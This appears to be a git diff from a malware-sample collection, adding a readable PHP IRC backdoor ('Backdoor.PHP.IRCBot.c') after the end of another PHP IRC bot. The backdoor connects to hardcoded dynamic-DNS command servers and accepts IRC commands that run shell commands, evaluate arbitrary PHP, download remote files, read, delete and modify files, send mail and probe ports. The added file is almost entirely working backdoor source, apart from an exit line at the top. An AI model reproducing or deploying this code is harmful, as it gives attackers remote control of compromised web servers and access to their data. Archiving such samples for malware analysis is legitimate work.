fputs($fp,'PRIVMSG '.$dNick.' :Secret Help' . CRL);
|
||||||
|
}
|
||||||
|
} else { fputs($fp,'NOTICE '.$dNick.' :Please Auth First! Type: auth <your pass> To Authorized '. CRL); }
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (!$auth["$dNick"] && !eregi("auth",$iText)) {
|
||||||
|
if (eregi("www.",$iText) || eregi("http:",$iText) || eregi("join #",$iText)) {
|
||||||
|
if (!ereg("#",$dCommand)) {
|
||||||
|
if ($log=="on") {
|
||||||
|
fputs($fp,'PRIVMSG '. $Admin .' :_4inviter: ' . $dFrom . '_2:' .$iText. CRL);
|
||||||
|
}
|
||||||
|
$inv = strstr($dFrom,'@');
|
||||||
|
foreach ($auth as $user) {
|
||||||
|
if ($user["status"]=="user") {
|
||||||
|
fputs($fp, 'NOTICE '.$user["name"].' :_KB '.$chan.' '.$dNick.' '.$inv.'_' . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (!ereg("#",$dCommand)) {
|
||||||
|
if ($log=="on") {
|
||||||
|
fputs($fp,'PRIVMSG '.$Admin.' :_6' . $dFrom . '_12:' .$iText. CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
elseif (substr($data,0,4) == 'PING') {
|
||||||
|
fputs($fp,'PONG ' . substr($data,5) . CRL);
|
||||||
|
$smile = $querym[rand(0,count($querym) - 1)];
|
||||||
|
$kata1 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
|
||||||
|
$kata2 = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
|
||||||
|
fputs($fp,'PRIVMSG #whatz :' . $kata1 . ' ' . $kata2 . $smile . CRL);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
fclose ($fp);
|
||||||
|
} while ($keluar==0);
|
||||||
|
}
|
||||||
|
working($nick);
|
||||||
|
?>
|
713
PHP/Backdoor.PHP.IRCBot.c
Normal file
713
PHP/Backdoor.PHP.IRCBot.c
Normal file
@ -0,0 +1,713 @@
|
|||||||
|
<?php
|
||||||
|
// "PHP/Obfu.A"
|
||||||
|
// Found on Google (http://www.google.com/search?q=%24ra87deb01c5f53&num=20&hl=en&safe=off&filter=0)
|
||||||
|
// I have no clue if it runs, didn't test it, just wanted to see how it worked so I made it readable.
|
||||||
|
exit('no...');
|
||||||
|
|
||||||
|
set_time_limit(0);
|
||||||
|
ini_set("max_execution_time", 0);
|
||||||
|
set_magic_quotes_runtime(0);
|
||||||
|
ini_set('output_buffering', 0);
|
||||||
|
error_reporting(0);
|
||||||
|
ignore_user_abort();
|
||||||
|
|
||||||
|
$settings = array(
|
||||||
|
"po" => 8080, // Port
|
||||||
|
"sp" => "uJijk4iVsIXRmQ==", // Server Password, secretpass
|
||||||
|
"ch" => "aFaw", // Channel, ##p
|
||||||
|
"ke" => "spd1iYSUqA==", // Channel Key, md5hash
|
||||||
|
"ha" => "dG1qQk1halK/nE6N", // Admin host RegEx, /:*!*@*.av$/
|
||||||
|
"pa" => "fpekVYhVdlWQXGLBXnBWWId1hll1WVWJVFpYh1tahVs=", // Admin password (md5 hash), 9dd4e461268c8034f5c8564e155c67a6
|
||||||
|
"tr" => "*", // Command prefix
|
||||||
|
"mrnd" => 9, // Nick/User length
|
||||||
|
"mo" => "cqtrig==", // -x+i
|
||||||
|
"ve" => "dmFyWA==" // 1.27
|
||||||
|
);
|
||||||
|
|
||||||
|
function remove_spaces($input)
|
||||||
|
{
|
||||||
|
$input = str_replace(" ", "", $input);
|
||||||
|
return $input;
|
||||||
|
}
|
||||||
|
|
||||||
|
function decode($input)
|
||||||
|
{
|
||||||
|
$input = base64_decode(remove_spaces($input));
|
||||||
|
return $input;
|
||||||
|
}
|
||||||
|
|
||||||
|
function connect()
|
||||||
|
{
|
||||||
|
global $settings;
|
||||||
|
$logged_in = array(
|
||||||
|
);
|
||||||
|
|
||||||
|
$last_line = "";
|
||||||
|
$servers = array(
|
||||||
|
"sqytlpaKo4a/lI6MnaWIiI+zUYSvkA==", // mymusicband.weedns.com
|
||||||
|
"sqywiZKPpZLTk4zDmG6aiYakkZRuhpCR", // myphonenumber.weedns.com
|
||||||
|
"rpihlYyTr5LWVKHDi6SRl0+jko4=", // ieatironx.weedns.com
|
||||||
|
"rZytgpFPr5TDlI7MmW6FiQ==", // himan.opendns.be
|
||||||
|
"sKJuhYdPopDTi5bHlKVRhoY=", // ko.dd.blueline.be
|
||||||
|
"tWeuVFZSclfDVI7CVKKPmYasjI+lUYOJ", // p4n33123e.dd.blueline.be
|
||||||
|
"vaOokJFUbpPOi5jClLNRhoY=", // xphon3.opendns.be
|
||||||
|
"sqywiZKPpVeMipjHlm6RiZU=", // myphone3.dnip.net
|
||||||
|
"sqytlpaKo5eMipjHlm6RiZU=" // mymusics.dnip.net
|
||||||
|
);
|
||||||
|
|
||||||
|
shuffle($servers);
|
||||||
|
|
||||||
|
if (($socket = fsockopen(decrypt_settings($servers[0]), $settings['po'], $errorno, $errorstr, 15))) {
|
||||||
|
$current_nick = generate_nick($settings['mrnd']);
|
||||||
|
|
||||||
|
if (strlen($settings['sp']) > 0) {
|
||||||
|
// UEFTUw==: PASS
|
||||||
|
write_file($socket, decode("UEFTUw=="). " " . decrypt_settings($settings['sp']));
|
||||||
|
}
|
||||||
|
|
||||||
|
// VVNFUg==: USER
|
||||||
|
write_file($socket, decode("VVNFUg=="). " " . generate_user($settings['mrnd']).
|
||||||
|
" 127.0.0.1 localhost :$current_nick");
|
||||||
|
|
||||||
|
// TklDSw==: NICK
|
||||||
|
write_file($socket, decode("TklDSw=="). " $current_nick");
|
||||||
|
|
||||||
|
while (!feof($socket)) {
|
||||||
|
$line = trim(fgets($socket, 512));
|
||||||
|
$irc_params = explode(" ", $line);
|
||||||
|
|
||||||
|
if (($line == $last_line))
|
||||||
|
continue;
|
||||||
|
|
||||||
|
// UElORw==: PING
|
||||||
|
if (isset($irc_params[0]) && $irc_params[0] == decode("UElORw==")) {
|
||||||
|
// UE9ORw==: PONG
|
||||||
|
write_file($socket, decode("UE9ORw=="). " " . $irc_params[1]);
|
||||||
|
}
|
||||||
|
else if (isset($irc_params[1]) && $irc_params[1] == decode("MDAx")) {
|
||||||
|
// TU9ERQ==: MODE
|
||||||
|
write_file($socket, decode("TU9ERQ=="). " $current_nick " . decrypt_settings($settings['mo']));
|
||||||
|
|
||||||
|
// Sk9JTg==: JOIN
|
||||||
|
write_file($socket, decode("Sk9JTg=="). " " . decrypt_settings($settings['ch']). " " .
|
||||||
|
decrypt_settings($settings['ke']));
|
||||||
|
}
|
||||||
|
else if (isset($params[1]) && $params[1] == decode("NDMz")) {
|
||||||
|
// TklDSw==: NICK
|
||||||
|
write_file($socket, decode("TklDSw=="). " $current_nick");
|
||||||
|
}
|
||||||
|
else if (isset($irc_params[1]) && isset($logged_in[$irc_params[1]])) {
|
||||||
|
unset($logged_in[$irc_params[1]]);
|
||||||
|
}
|
||||||
|
// UFJJVk1TRw==: PRIVMSG
|
||||||
|
else if (isset($irc_params[1]) && ($irc_params[1] == decode("UFJJVk1TRw==") || $irc_params[1] == "332")) {
|
||||||
|
$full_params = strstr($line, " :");
|
||||||
|
$full_params = substr($full_params, 2);
|
||||||
|
$params = explode(" ", $full_params);
|
||||||
|
$target_host = $irc_params[0];
|
||||||
|
$target_nick = explode("!", $target_host);
|
||||||
|
$target_nick = substr($target_nick[0], 1);
|
||||||
|
$silent = FALSE;
|
||||||
|
|
||||||
|
// VkVSU0lPTg==: VERSION
|
||||||
|
if ($params[0] == "\1" . decode("VkVSU0lPTg=="). "\1") {
|
||||||
|
// VkVSU0lPTg==: VERSION
|
||||||
|
write_file($socket, "NOTICE " . $target_nick . " :\1" . decode("VkVSU0lPTg=="). " " .
|
||||||
|
decrypt_settings($settings['ve']). "\1");
|
||||||
|
}
|
||||||
|
|
||||||
|
for ($i = 0; $i < count($params); $i++) {
|
||||||
|
if ($params[$i] == "-s") {
|
||||||
|
$silent = TRUE;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($irc_params[1] == "332") {
|
||||||
|
$target = $irc_params[3];
|
||||||
|
}
|
||||||
|
elseif ($irc_params[2] == $current_nick) {
|
||||||
|
$target = $target_nick;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$target = $irc_params[2];
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($params[0] == PHP_OS) {
|
||||||
|
array_shift($params);
|
||||||
|
}
|
||||||
|
|
||||||
|
if (substr($params[0], 0, 1) == $settings['tr']) {
|
||||||
|
if (isset($logged_in[$target_host]) || $irc_params[1] == "332") {
|
||||||
|
switch (substr($params[0], 1)) {
|
||||||
|
// sKM=: lo
|
||||||
|
case decrypt_command("sKM="):
|
||||||
|
if ($irc_params[1] != "332") {
|
||||||
|
$logged_in[$target_host] = FALSE;
|
||||||
|
|
||||||
|
// I'm not sure what is up with this, looks like a bug, htmen is not a function
|
||||||
|
send_irc_message($socket, $silent, $target, htmen("b3V0"));
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// qGWaoKKb: d1enow
|
||||||
|
case decrypt_command("qGWaoKKb"):
|
||||||
|
// UVVJVCA6SSBRVUlU: QUIT :I QUIT
|
||||||
|
write_file($socket, decode("UVVJVCA6SSBRVUlU"));
|
||||||
|
fclose($socket);
|
||||||
|
exit(0);
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tpWs: raw
|
||||||
|
case decrypt_command("tpWs"):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
write_file($socket, substr($full_params, strlen($params[0])));
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// sKc=: ls
|
||||||
|
case decrypt_command("sKc="):
|
||||||
|
if (isset($params[1])) {
|
||||||
|
$directory = $params[1];
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$directory = getcwd();
|
||||||
|
}
|
||||||
|
|
||||||
|
if (is_dir($directory)) {
|
||||||
|
if (($handle = opendir($directory))) {
|
||||||
|
// RGlyLy8gTm93...: Dir// Now listing:
|
||||||
|
send_irc_message($socket, $silent, $target, decode("RGlyLy8gTm93IGxpc3Rpbmc6"). " \2" .
|
||||||
|
$directory . "\2");
|
||||||
|
|
||||||
|
while (($file = readdir($handle)) !== FALSE) {
|
||||||
|
if ($file != "." && $file != "..") {
|
||||||
|
send_irc_message($socket, $silent, $target, "> (" . filetype($directory . "/" .
|
||||||
|
$file). ") $file");
|
||||||
|
sleep(1);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
closedir();
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// RGlyLy8gVW5h...: Dir// Unable to list contents of
|
||||||
|
send_irc_message($socket, $silent, $target,
|
||||||
|
decode("RGlyLy8gVW5hYmxlIHRvIGxpc3QgY29udGVudHMgb2Y="). " \2" . $directory . "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// RGlyLy8=: Dir//
|
||||||
|
// aXMgbm90IGEgZGlyIQ==: is not a dir!
|
||||||
|
send_irc_message($socket, $silent, $target, decode("RGlyLy8="). " \2" . $directory . "\2 " .
|
||||||
|
decode("aXMgbm90IGEgZGlyIQ=="));
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p5Wp: cat
|
||||||
|
case decrypt_command("p5Wp"):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (is_file($params[1])) {
|
||||||
|
if (($file_handle = fopen($params[1], "r"))) {
|
||||||
|
// Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=: CAT// Now reading file:
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q0FULy8gTm93IHJlYWRpbmcgZmlsZTo=").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
|
||||||
|
while (!feof($file_handle)) {
|
||||||
|
$file_line = trim(fgets($file_handle, 256));
|
||||||
|
send_irc_message($socket, $silent, $target, "> $file_line");
|
||||||
|
sleep(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
send_irc_message($socket, $silent, $target, "> [EOF]");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q0FULy8gQ291bGRuJ3Qgb3Blbg==: CAT// Couldn't open
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q0FULy8gQ291bGRuJ3Qgb3Blbg==").
|
||||||
|
" \2" . $params[1]. "\2 for reading.");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q0FULy8=: CAT//
|
||||||
|
// aXMgbm90IGEgZmlsZQ==: is not a file
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q0FULy8="). " \2" . $params[1]. "\2 " .
|
||||||
|
decode("aXMgbm90IGEgZmlsZQ=="));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tKuZ: pwd
|
||||||
|
case decrypt_command("tKuZ"):
|
||||||
|
// UFdELy8gQ3VycmVudCBkaXI6: PWD// Current dir:
|
||||||
|
send_irc_message($socket, $silent, $target, decode("UFdELy8gQ3VycmVudCBkaXI6"). " " . getcwd());
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p5g=: cd
|
||||||
|
case decrypt_command("p5g="):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (chdir($params[1])) {
|
||||||
|
// Q0QvLyBDaGFuZ2VkIGRpciB0bw==: CD// Changed dir to
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q0QvLyBDaGFuZ2VkIGRpciB0bw=="). " " .
|
||||||
|
$params[1]);
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg==: CD// Failed to change dir
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q0QvLyBGYWlsZWQgdG8gY2hhbmdlIGRpcg=="));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tqE=: rm
|
||||||
|
case decrypt_command("tqE="):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (unlink($params[1])) {
|
||||||
|
// Uk0vLyBEZWxldGVk: RM// Deleted
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Uk0vLyBEZWxldGVk"). " \2" .
|
||||||
|
$params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Uk0vLyBGYWlsZWQgdG8gZGVsZXRl: RM// Failed to delete
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Uk0vLyBGYWlsZWQgdG8gZGVsZXRl").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// uKOqlZs=: touch
|
||||||
|
case decrypt_command("uKOqlZs="):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (touch($params[1])) {
|
||||||
|
// VG91Y2gvLyBUb3VjaGVk: Touch// Touched
|
||||||
|
send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBUb3VjaGVk"). " \2" .
|
||||||
|
$params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=: Touch// Failed to touch
|
||||||
|
send_irc_message($socket, $silent, $target, decode("VG91Y2gvLyBGYWlsZWQgdG8gdG91Y2g=").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// t62inpySoA==: symlink
|
||||||
|
case decrypt_command("t62inpySoA=="):
|
||||||
|
if (count($params) > 2) {
|
||||||
|
if (symlink($params[1], $params[2])) {
|
||||||
|
// U3ltTGluay8vIFN5bWxpbmtlZA==: SymLink// Symlinked
|
||||||
|
send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIFN5bWxpbmtlZA==").
|
||||||
|
" \2" . $params[2]. "\2 To \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// U3ltTGluay8vIEZhaWxlZCB0byBsaW5r: SymLink// Failed to link
|
||||||
|
send_irc_message($socket, $silent, $target, decode("U3ltTGluay8vIEZhaWxlZCB0byBsaW5r").
|
||||||
|
" \2" . $params[2]. "\2 To \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p5ykqaE=: chown
|
||||||
|
case decrypt_command("p5ykqaE="):
|
||||||
|
if (count($params) > 2) {
|
||||||
|
if (chown($params[1], $params[2])) {
|
||||||
|
// Q2hvd24vLyBDaG93bmVk: Chown// Chowned
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBDaG93bmVk").
|
||||||
|
" \2" . $params[1]. "\2 To \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=: Chown// Failed to chown
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q2hvd24vLyBGYWlsZWQgdG8gY2hvd24=").
|
||||||
|
" \2" . $params[1]. "\2 To \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p5yioZc=: chmod
|
||||||
|
case decrypt_command("p5yioZc="):
|
||||||
|
if (count($params) > 2) {
|
||||||
|
if (chmod($params[1], $params[2])) {
|
||||||
|
// Q2htb2QvLyBDaG1vZGRlZA==: Chmod// Chmodded
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBDaG1vZGRlZA==").
|
||||||
|
" \2" . $params[1]. "\2 with permissions \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=: Chmod// Failed to chmod
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q2htb2QvLyBGYWlsZWQgdG8gY2htb2Q=").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// sZ+Zm6U=: mkdir
|
||||||
|
case decrypt_command("sZ+Zm6U="):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (mkdir($params[1])) {
|
||||||
|
// TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==: MKDir// Created directory
|
||||||
|
send_irc_message($socket, $silent, $target, decode("TUtEaXIvLyBDcmVhdGVkIGRpcmVjdG9yeQ==").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ==: MKDir// Failed to create directory
|
||||||
|
send_irc_message($socket, $silent, $target,
|
||||||
|
decode("TUtEaXIvLyBGYWlsZWQgdG8gY3JlYXRlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tqGZm6U=: rmdir
|
||||||
|
case decrypt_command("tqGZm6U="):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
if (rmdir($params[1])) {
|
||||||
|
// Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==: RMDir// Removed directory
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Uk1EaXIvLyBSZW1vdmVkIGRpcmVjdG9yeQ==").
|
||||||
|
" \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ==: RMDir// Failed to remove directory
|
||||||
|
send_irc_message($socket, $silent, $target,
|
||||||
|
decode("Uk1EaXIvLyBGYWlsZWQgdG8gcmVtb3ZlIGRpcmVjdG9yeQ=="). " \2" . $params[1]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p6Q=: cp
|
||||||
|
case decrypt_command("p6Q="):
|
||||||
|
if (count($params) > 2) {
|
||||||
|
if (copy($params[1], $params[2])) {
|
||||||
|
// Q1AvLyBDb3BpZWQ=: CP// Copied
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q1AvLyBDb3BpZWQ="). " \2" . $params[1].
|
||||||
|
"\2 to \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// Q1AvLyBGYWlsZWQgdG8gY29weQ==: CP// Failed to copy
|
||||||
|
send_irc_message($socket, $silent, $target, decode("Q1AvLyBGYWlsZWQgdG8gY29weQ=="). " \2" .
|
||||||
|
$params[1]. "\2 to \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// sZWeng==: mail
|
||||||
|
case decrypt_command("sZWeng=="):
|
||||||
|
if (count($params) > 4) {
|
||||||
|
$from = "From: <" . $params[2]. ">\r\n";
|
||||||
|
|
||||||
|
if (mail($params[1], $params[3], substr($full_params, $params[4]), $from)) {
|
||||||
|
// TWFpbC8v: Mail//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Message sent to \2" .
|
||||||
|
$params[1]. "\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// TWFpbC8v: Mail//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("TWFpbC8v"). " Send failure");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// sZ+ilmg=: mkmd5
|
||||||
|
case decrypt_command("sZ+ilmg="):
|
||||||
|
// TUQ1Ly8=: MD5//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("TUQ1Ly8="). " " . md5($params[1]));
|
||||||
|
break;
|
||||||
|
|
||||||
|
// qKKo: dns
|
||||||
|
case decrypt_command("qKKo"):
|
||||||
|
if (isset($params[1])) {
|
||||||
|
$ip_array = explode(".", $params[1]);
|
||||||
|
|
||||||
|
if (count($ip_array) == 4 && is_numeric($ip_array[0]) && is_numeric($ip_array[1]) &&
|
||||||
|
is_numeric($ip_array[2]) && is_numeric($ip_array[3])) {
|
||||||
|
// RE5TLy8=: DNS//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " .
|
||||||
|
gethostbyaddr($params[1]));
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// RE5TLy8=: DNS//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("RE5TLy8="). " " . $params[1]. " -> " .
|
||||||
|
gethostbyname($params[1]));
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tpmoppSWqQ==: restart
|
||||||
|
case decrypt_command("tpmoppSWqQ=="):
|
||||||
|
// UVVJVCA6UVVJVC4uLg==: QUIT :QUIT...
|
||||||
|
write_file($socket, decode("UVVJVCA6UVVJVC4uLg=="));
|
||||||
|
fclose($socket);
|
||||||
|
connect();
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tqI=: rn
|
||||||
|
case decrypt_command("tqI="):
|
||||||
|
if (isset($params[1])) {
|
||||||
|
$current_nick = generate_nick((int)$params[1]);
|
||||||
|
|
||||||
|
// TklDSw==: NICK
|
||||||
|
write_file($socket, decode("TklDSw=="). " $current_nick");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$current_nick = generate_nick($settings['mrnd']);
|
||||||
|
|
||||||
|
// TklDSw==: NICK
|
||||||
|
write_file($socket, decode("TklDSw=="). " $current_nick");
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tJyl: php
|
||||||
|
case decrypt_command("tJyl"):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
eval(substr($full_params, strlen($params[0])));
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// q5mp: get
|
||||||
|
case decrypt_command("q5mp"):
|
||||||
|
if (count($params) > 2) {
|
||||||
|
if (!($file_handle = fopen($params[2], "w"))) {
|
||||||
|
// R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Permission denied
|
||||||
|
send_irc_message($socket, $silent, $target,
|
||||||
|
decode("R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ="));
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
if (!($file_array = file($params[1]))) {
|
||||||
|
// R2V0Ly8gUGVybWlzc2lvbiBkZW5pZWQ=: Get// Bad URL/DNS error
|
||||||
|
send_irc_message($socket, $silent, $target,
|
||||||
|
decode("R2V0Ly8gQmFkIFVSTC9ETlMgZXJyb3I="));
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
for ($i = 0; $i < count($file_array); $i++) {
|
||||||
|
fwrite($file_handle, $file_array[$i]);
|
||||||
|
}
|
||||||
|
|
||||||
|
// R2V0Ly8=: Get//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("R2V0Ly8=").
|
||||||
|
" \2" . $params[1]. "\2 downloaded to \2" . $params[2]. "\2");
|
||||||
|
}
|
||||||
|
fclose($file_handle);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// sp0=: ni
|
||||||
|
case decrypt_command("sp0="):
|
||||||
|
// TmV0SW5mby8v: NetInfo//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("TmV0SW5mby8v"). " IP: " . $_SERVER['SERVER_ADDR'].
|
||||||
|
" Hostname: " . $_SERVER['SERVER_NAME']);
|
||||||
|
break;
|
||||||
|
|
||||||
|
// t50=: si
|
||||||
|
case decrypt_command("t50="):
|
||||||
|
// U3lzaW5mby8v: Sysinfo//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("U3lzaW5mby8v"). " [User: " . get_current_user().
|
||||||
|
"] [PID: " . getmypid(). "] [Version: PHP " . phpversion(). "] [OS: " . PHP_OS .
|
||||||
|
"] [Server_software: " . $_SERVER['SERVER_SOFTWARE']. "] [Server_name: " . $_SERVER['SERVER_NAME'].
|
||||||
|
"] [Admin: " . $_SERVER['SERVER_ADMIN']. "] [Docroot: " . $_SERVER['DOCUMENT_ROOT']. "] [HTTP Host:
|
||||||
|
" . $_SERVER['HTTP_HOST']. "] [URL: " . $_SERVER['REQUEST_URI']. "]");
|
||||||
|
break;
|
||||||
|
|
||||||
|
// tKOnpqKUmuw=: portopen
|
||||||
|
case decrypt_command("tKOnpqKUmuw="):
|
||||||
|
if (isset($params[1], $params[2])) {
|
||||||
|
if (fsockopen($params[1], (int)$params[2], $t56bd7107802eb, $errorstr, 5)) {
|
||||||
|
// UG9ydENoay8v: PortChk//
|
||||||
|
send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1].
|
||||||
|
":" . $params[2]. " is \2Open\2");
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// UG9ydENoay8v: PortChk//
|
||||||
|
send_irc_message($socket, $silent, $target, "" . decode("UG9ydENoay8v"). " " . $params[1].
|
||||||
|
":" . $params[2]. " is \2Closed\2");
|
||||||
|
}
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// uaKWn5g=: uname
|
||||||
|
case decrypt_command("uaKWn5g="):
|
||||||
|
// VW5hbWUvLw==: Uname//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("VW5hbWUvLw=="). " " . php_uname());
|
||||||
|
break;
|
||||||
|
|
||||||
|
// rZg=: id
|
||||||
|
case decrypt_command("rZg="):
|
||||||
|
// SUQvLw==: ID//
|
||||||
|
send_irc_message($socket, $silent, $target, decode("SUQvLw=="). " " . getmypid());
|
||||||
|
break;
|
||||||
|
|
||||||
|
// p6GZ: cmd
|
||||||
|
case decrypt_command("p6GZ"):
|
||||||
|
if (count($params) > 1) {
|
||||||
|
$process_handle = popen(substr($full_params, strlen($params[0])), "r");
|
||||||
|
|
||||||
|
while (!feof($process_handle)) {
|
||||||
|
$output = trim(fgets($process_handle, 512));
|
||||||
|
|
||||||
|
if (strlen($output) > 0) {
|
||||||
|
send_irc_message($socket, $silent, $target, "> " . $output);
|
||||||
|
sleep(1);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// PiBbRU9GXQ==: > [EOF]
|
||||||
|
send_irc_message($socket, $silent, $target, decode("PiBbRU9GXQ=="));
|
||||||
|
}
|
||||||
|
break;
|
||||||
|
|
||||||
|
// qayalaiYmg==: execute
|
||||||
|
case decrypt_command("qayalaiYmg=="):
|
||||||
|
execute(substr($full_params, strlen($params[0])));
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
switch (substr($params[0], 1)) {
|
||||||
|
// bg==: *
|
||||||
|
case decrypt_command("bg=="):
|
||||||
|
if (isset($params[1]) &&
|
||||||
|
md5($params[1]) == decrypt_settings($settings['pa']) &&
|
||||||
|
preg_match(decrypt_settings($settings['ha']), $target_host)) {
|
||||||
|
|
||||||
|
// UmVhZHkvLyBPaw==: Ready// Ok
|
||||||
|
send_irc_message($socket, $silent, $target, decode("UmVhZHkvLyBPaw=="));
|
||||||
|
$logged_in[$target_host] = TRUE;
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
// UmVhZHkvLyByZWplY3RlZA==: Ready// rejected
|
||||||
|
send_irc_message($socket, FALSE, decrypt_settings($settings['ch']),
|
||||||
|
decode("UmVhZHkvLyByZWplY3RlZA=="));
|
||||||
|
}
|
||||||
|
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
